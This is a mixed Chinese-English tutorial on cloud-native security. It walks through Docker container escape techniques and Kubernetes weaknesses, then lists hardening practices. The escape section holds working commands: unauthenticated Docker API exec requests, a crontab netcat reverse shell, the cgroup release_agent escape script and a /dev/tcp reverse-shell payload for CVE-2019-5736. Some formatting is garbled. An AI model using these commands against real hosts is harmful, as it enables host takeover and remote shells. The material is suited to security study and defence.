Table of Contents

Cloud Native Security

什么是Cloud Native Security

Cloud native (Cloud Native) is a set of technical system and methodology, which consists of two words, cloud (Cloud) and native (Native). Cloud (Cloud) means that the application is located in the cloud, rather than the traditional data center; Native (Native) means that the application is designed with the cloud environment in mind from the beginning, natively designed for the cloud, and runs optimally on the cloud , make full use of the flexibility and distributed advantages of the cloud platform.

Representative cloud-native technologies include containers, service mesh (Service Mesh), microservices (Microservice), immutable infrastructure, and declarative API.

Cloud Native Security的4个C

你可以分层去考虑安全性,Cloud Native Security的 4 个 C 分别是云(Cloud)、集群(Cluster)、容器(Container)和代码(Code)。

Each layer of the cloud-native security model builds on the next outermost layer, and the code layer benefits from a strong underlying security layer (cloud, cluster, container). You cannot protect against poor security standards in the base layer by addressing security at the code layer.

Security division according to different perspectives

Build-Deploy-Run

攻击前后

容器攻击面

容器本身的信息收集

判断当前机器是否为Docker容器环境

如果该进程就是应用进程则判断是容器,而如果是 init 进程或者 systemd 进程,则不一定是容器,当然不能排除是容器的情况,比如 LXD 实例的进程就为/sbin/init。

1
ps -p1

容器和虚拟机不一样的是,容器和宿主机是共享内核的,因此理论上容器内部是没有内核文件的,除非挂载了宿主机的/boot目录。

1
2
KERNEL_PATH=$(cat /proc/cmdline | tr ' ' '\n' | awk -F '=' '/BOOT_IMAGE/{print $2}')
test -e $KERNEL_PATH && echo "Not Sure" || echo "Container"
1
2
3
cat /proc/1/cgroup

cat /proc/1/cgroup | grep -qi docker && echo "Docker" || echo "Not Docker"

容器是通过 cgroup 实现资源限制,每个容器都会放到一个 cgroup 组中,如果是 Docker,则 cgroup 的名称为docker-xxxx,其中xxxx为 Docker 容器的 UUID。而控制容器的资源,本质就是控制运行在容器内部的进程资源,因此我们可以通过查看容器内部进程为 1 的 cgroup 名称获取线索。

1
2
3
ls -la /.dockerenv

[[ -f /.dockerenv ]] && echo "Docker" || echo "Not Docker"
1
2
3
4
5
sudo readlink /proc/1/exe
// 如果返回system字样则为宿主机

systemd-detect-virt -c
// 返回none则为宿主机

容器逃逸

配置不当导致Docker逃逸

Docker Remote API 未授权访问

docker swarm

1
docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供

docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务,可以通过HTTP、Python、调用API来操作Docker。

漏洞环境搭建

使用vulhub搭建漏洞环境:docker daemon api 未授权访问漏洞

漏洞利用一 容器RCE

1
curl -i -s -X GET http://<docker_host>:PORT/containers/json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188

{
"AttachStdin": true,
"AttachStdout": true,
"AttachStderr": true,
"Cmd": ["cat", "/etc/passwd"],
"DetachKeys": "ctrl-p,ctrl-q",
"Privileged": true,
"Tty": true
}

bash 命令

1
2
3
4
curl -i -s -X POST \
-H "Content-Type: application/json" \
--data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \
http://<docker_host>:PORT/containers/<container_id>/exec
1
2
3
4
5
6
7
8
POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json

{
"Detach": false,
"Tty": false
}

bash命令

1
2
3
4
curl -i -s -X POST \
-H 'Content-Type: application/json' \
--data-binary '{"Detach": false,"Tty": false}' \
http://<docker_host>:PORT/exec/<exec_id>/start

漏洞利用二 宿主机RCE

利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。

1
2
3
4
import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

使用cdk进行漏洞利用

使用cdk直接执行命令:

1
./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"

挂在宿主机根目录/到容器内部/host,然后执行用户输入的指令来篡改宿主机的文件,比如可以写/etc/crontab来搞定宿主机。

参考:Exploit: docker api pwn

Docker 高危启动参数 –privileged 特权模式启动容器

原因

1
当操作者执行docker run --privileged时,When the operator executes docker run --privileged, Docker will allow the container to access all devices on the host, and at the same time modify the configuration of AppArmor or SELinux so that the container has almost the same access rights as those processes running directly on the host.

环境搭建

1
sudo docker run -itd --privileged ubuntu:latest /bin/bash

漏洞利用

1
2
3
4
查看磁盘文件: fdisk -l
新建目录以备挂载: mkdir /aa
将宿主机/dev/sda1目录挂载至容器内 /aa: mount /dev/sda1 /aa
即可写文件获取权限或数据

使用cdk:

1
./cdk run mount-disk

Docker 高危启动参数 –cap-add=SYS_ADMIN 利用

Docker 通过Linux namespace use Docker implements 6 resource isolation through Linux namespace, including host name, user authority, file system, network, process number, and inter-process communication. However, some startup parameters grant greater permissions to the container, thus breaking the boundary of resource isolation.

1
2
3
4
--cap-add=SYS_ADMIN  启动时,允许执行mount特权操作,需获得资源挂载进行利用。
--net=host 启动时,绕过Network Namespace
--pid=host 启动时,绕过PID Namespace
--ipc=host 启动时,绕过IPC Namespace

前提:

1
2
3
4
在容器内root用户
容器必须使用SYS_ADMIN Linux capability运行
容器必须缺少AppArmor配置文件,否则将允许mount syscall
cgroup v1虚拟文件系统必须以读写方式安装在容器内部

我们需要一个cgroup,可以在其中写入notify_on_release文件(for enable cgroup notifications),挂载cgroup控制器并创建子cgroup,创建/bin/sh进程并将其PID写入cgroup.procs文件,sh退出后执行release_agent文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

查看导出的文件

1
2
ls /tmp/cgrp
cat /output

危险挂载导致Docker逃逸

挂载目录(-v /:/soft)

1
docker run -itd -v /dir:/dir ubuntu:18.04 /bin/bash

挂载 Docker Socket

逃逸复现

1
docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
apt-update
apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
"deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/ \
$(lsb_release -cs) \
stable"
apt-get update
apt-get install docker-ce docker-ce-cli containerd.io
1
docker run -it -v /:/host ubuntu:18.04 /bin/bash
1
chroot /test

使用cdk工具执行命令:

1
./cdk run docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"

挂载 procfs 目录

关于procfs

1
procfs是一个伪文件系统,它动态反映着系统内进程及其他组件的状态,其中有许多十分敏感重要的文件。因此,将宿主机的procfs挂载到不受控的容器中也是十分危险的,尤其是在该容器内默认启用root权限,且没有开启User Namespace时

漏洞利用过程比较复杂,但是可以通过cdk快速利用。example:

  1. 宿主机启动测试容器,挂载宿主机的procfs,尝试逃逸当前容器。docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc –rm -it ubuntu bash
  2. 容器内部执行 ./cdk run mount-procfs /mnt/host_proc “touch /tmp/exp-success”
  3. 宿主机中出现/tmp/exp-success文件,说明exp已经成功执行,攻击者可以在宿主机执行任意命令。

参考:Exploit: mount procfs

挂载 cgroup 目录

使用cdk进行利用

1
./cdk run mount-cgroup "<shell-cmd>"

程序漏洞导致Docker逃逸

CVE-2019-5736 runc容器逃逸漏洞

漏洞详情

Docker、containerd或者其他基于runc的容器运行时存在安全漏洞,攻击者通过特定的容器镜像或者exec操作可以获取到宿主机的runc执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。

影响范围

Docker版本 < 18.09.2
runc版本 <= 1.0-rc6。

利用步骤

使用POC:

POC: CVE-2019-5736-PoC

1
2
vi main.go
payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"
1
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
1
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

CVE-2019-14271 Docker cp command container escape attack vulnerability

Vulnerability details

When the Docker host uses the cp command, it will call the auxiliary process docker-tar, which is not containerized, and will dynamically load some libnss.so libraries at runtime. Hackers can inject code into docker-tar by replacing libraries such as libnss.so in the container. When a Docker user tries to copy a file from a container, malicious code will be executed, and the Docker escape will be successfully achieved and the root privilege of the host machine will be obtained.

Range of Influence

Docker 19.03.0

Vulnerability Reference

Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

CVE-2019-13139 Docker build code execution

Vulnerability Reference

CVE- 2019-13139 - Docker build code execution

Kernel vulnerability causes Docker-escape

DirtyCow(CVE-2016-5195) Dirty Cow Vulnerability Realizes Docker Escape

Vulnerability Description

1
Dirty Cow (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel, through which the Docker container can escape and obtain a shell with root privileges . 

Docker shares the kernel with the host, so the container needs to be in the host with the dirtyCow vulnerability.

Vulnerability reproduction

Environment acquisition: git clone https://github.com/ gebl/dirtycow-docker-vdso.git

Tools use CDK

CDK : https://github.com/cdk-team/CDK

Copy to container

1
2
3
4
5< /span>
6
7
# host
docker cp /Users/ ljluestc/Downloads/cdk_linux_amd64 e39eb7abd9e6:/root

# Container< /span>
cd /root
mv cdk_linux_amd64 cdk
chmod 777 cdk

Common commands

1
2
3
4
5< /span>
6
7
8
# Information Collection 
cdk evaluate

# list all exp
cdk run --list

# Execute the specified exp
cdk run <script-name> [ options]

k8s security issue

Through the detection items of cdk's evaluate, you can look at the security issues of k8s.

k8s builds a stepping pit

Reference:

  • First install k8s through docker-desktop, refer to: https ://github.com/maguowei/k8s-docker-desktop-for-mac
  • Install k8s kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml
  • Enable local proxy kubectl proxy
  • Visit http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
  • Get the token in the following steps
  • Install helm
    1. brew install helm
    2. helm repo add stable http://mirror.azure.cn/kubernetes/ charts/
    3. helm repo update
    4. helm install my-mysql stable/mysql
  • Create a user:

    1
    kubectl apply -f dashboard-adminuser.yaml

    The content of dashboard-adminuser.yaml is as follows:

    1
    2
    3
    4
    5< /span>
    apiVersion: v1
    kind: ServiceAccount
    metadata:
    name: admin-user
    namespace: kube-system

    Get token

    1
    kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | awk ''''&# 123;print $1}')

    kube-proxy border bypass (CVE-2020-8558)

    An attacker may obtain interface information through a container on the same LAN, or through a cluster node accessing an adjacent node under the same Layer 2 domain to bind and monitor the TCP/UDP service on the local port 127.0.0.1.

    For detailed introduction, please refer to: CVE-2020-8558: Kubernetes local host boundary Bypassing Vulnerability Notice

    List services that may be affected:

    1
    2
    lsof +c 15 -P -n -i4TCP@127.0.0.1 - sTCP:LISTEN
    lsof +c 15 -P -n -i4UDP@127.0.0.1

    K8s Api-server

    Check the ENV information to determine whether the current container belongs to the K8s Pod, obtain the connection address of the K8s api-server and try to log in anonymously. If successful, it means that the K8s cluster can be directly taken over through the api-server.

    Reference: https:// github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

    The premise is that k8s must support anonymous login, which does not support anonymous login by default. If this problem exists, you can use cdk kcurl anonymous to initiate an HTTP request.

    K8s Service Account

    In the Pod created by the K8s cluster, the authentication credential of the K8s Service Account (/run/secrets/kubernetes.io/serviceaccount/token) is carried inside the container by default. CDK will use this credential to try to authenticate the K8s api-server server and access the high-level Permissions interface, if the execution is successful, it means that the account has high permissions, and you can directly use the Service Account to manage the K8s cluster.

    The test is as follows:

    -w869

    Connect to K8s api-server through cdk to initiate a custom HTTP request:

    First use cdk evaluate to determine whether this problem exists

    -w829

    Get the api-server address of k8s again:

    -w526

    Then request via cdk kcurl

    -w866

    Then use CDK to deploy backdoor Pod and shadow k8s api-server.

    Container Security Best Practices

    This part is translated from the Internet and will be sorted out later.

    • Container
    1. Always use the latest version of Docker
    2. Only allow trusted users to control the Docker daemon
    3. Ensuring that there are rules in place, can provide a review of the following
      1. Docker daemon
      2. /var/lib/docker
      3. /etc/docker
      4. Docker.service
      5. Docker.socket
      6. /etc/default/docker
      7. /etc/docker/daemon.json
      8. /etc/sysconfig/docker
      9. /usr/bin/containerd
      10. /usr/sbin/runc
  • Ensure all Docker files and directories are owned by an appropriate user (usually root) and set their file permissions to restrictive values to protect all Docker files and directories
  • Use a registry with a valid registry certificate or a registry that uses TLS to minimize the risk of traffic interception.
  • If you are using containers that do not have an explicit container user defined in the image, you should enable user namespace support, which will allow you to remap container users to host users.
  • Prevents the container from acquiring new privileges. By default, containers are allowed to acquire new privileges, so this configuration must be set explicitly. Another step you can take to minimize privilege escalation attacks is to remove setuid and setgid permissions from the image.
  • Run the container as a non-root user (UID not 0). By default, containers run as the root user inside the container.
  • When building containers, use only trusted base images.
  • Use a minimal base image that does not contain unnecessary packages that could lead to a larger attack surface.
  • Implement strong governance policies to enforce frequent image scanning.
  • Build a workflow that periodically identifies and removes stale or unused images and containers from the host.
  • Do not store secrets in the image/Dockerfile. By default, you are allowed to store secrets in a Dockerfile, but storing a secret in an image will make the secret accessible to any user of that image.
  • When running a container, remove any capabilities that are required for the container to function as desired.
  • Do not run containers with the --privileged flag, as this type of container will have most of the capabilities available to the underlying host. This flag will also override any rules you have set with CAP DROP or CAP ADD. (Add --no-new-privileges flag to always run docker images with --security-opt=no-new-privileges to prevent privilege escalation with setuid or setgid binaries.)
  • Do not mount sensitive host system directories on containers, especially in writable mode, as this may expose them to malicious changes that could compromise the host.
  • Don't run sshd inside the container. By default, the ssh daemon will not run in the container, and you should not install the ssh daemon to simplify security management of the SSH server
  • Do not map any ports below 1024 inside the container, as they transmit sensitive data and are therefore considered privileged ports. By default, Docker will map container ports to ports in the range 49153-65525, but it allows mapping containers to privileged ports. As a general rule of thumb, make sure you only open the ports you need on your containers.
  • Do not share the host's network namespace, process namespace, IPC namespace, user namespace, or UTS namespace unless necessary to ensure proper isolation between Docker containers and the underlying host.
  • Specify the amount of memory and CPU the container needs to run as designed, rather than relying on arbitrary amounts. By default, Docker containers share their resources equally without restriction.
  • Set the container's root filesystem to read-only. Once running, the container does not need to change the root filesystem. Any changes made to the root filesystem may be for malicious purposes. In order to preserve container immutability - not patching a new container but recreating it from a new image - you should not make the root filesystem writable.
  • PID limits are imposed. One of the advantages of containers is strict process identifier (PID) control. Every process in the kernel hosts a unique PID, and containers leverage the Linux PID namespace to provide each container with a separate view of the PID hierarchy. Setting limits on PIDs effectively limits the number of processes running in each container. Limiting the number of processes in a container prevents the spawning of new processes and potentially malicious lateral movement. Imposing PID limits also protects against fork bombs (processes that keep replicating themselves) and abnormal processes. Typically, the benefit of this is that if your service is always running a certain number of processes, setting the PID limit to that exact number can mitigate many malicious behaviors, including reverse shells and remote code injections – in fact,
  • Do not configure your mount propagation rules to share. Shared mount propagation means that any changes made to a mount will be propagated to all instances of that mount. Instead, set mount propagation to slave or private mode so that necessary changes to the volume are not shared with (or propagated to) containers that do not require the change.
  • Do not use the docker exec command with the private or user=root options, as this setting enables extended Linux capabilities to the container
  • Do not use the default bridge "docker0". Using the default bridge allows you to easily deal with ARP spoofing and MAC flooding attacks. Instead, containers should be on a user-defined network instead of the default "docker0" bridge.
  • Do not mount the Docker socket inside the container, as this approach will allow the process inside the container to execute commands, giving it complete control over the host machine.
  • Rule 5 - Disallow inter-container communication (–icc = false)
  • Use Linux security modules (seccomp, AppArmor or SELinux)
  • Rule 7 - Limit resources (memory, CPU, file descriptors, processes, restarts)
  • Rule #8 - Make filesystems and volumes read-only
  • Rule 10 - Set logging level to at least INFO¶
    • Kubernetes Security Best Practices
    1. For RBAC, specify your Roles and ClusterRoles for specific users or user groups instead of granting cluster-admin privileges to any user or user group.
    2. Avoid duplicating permissions when using Kubernetes RBAC, as doing so may cause operational issues.
    3. Delete unused or inactive RBAC roles to focus on active roles when troubleshooting failures or investigating security incidents.
    4. Use Kubernetes network policies to isolate your pods and explicitly allow the communication paths required for your application to function properly. Otherwise, you have both lateral and north-south threats.
    5. If your pod requires internet access (ingress or egress), then create an appropriate network policy to enforce proper network segmentation/firewall rules, then create a label for that network policy, and finally connect your pod to that Label association.
    6. Using the PodSecurityPolicy admission controller can ensure that proper management policies are enforced. PodSecurityPolicy controllers can prevent containers from running as root, or ensure that a container's root filesystem is mounted read-only (these suggestions sound familiar, since they were all on the previous list of Docker actions to take).
    7. Use a Kubernetes admission controller to enforce image registry management policies so that all images fetched from untrusted registries are automatically rejected.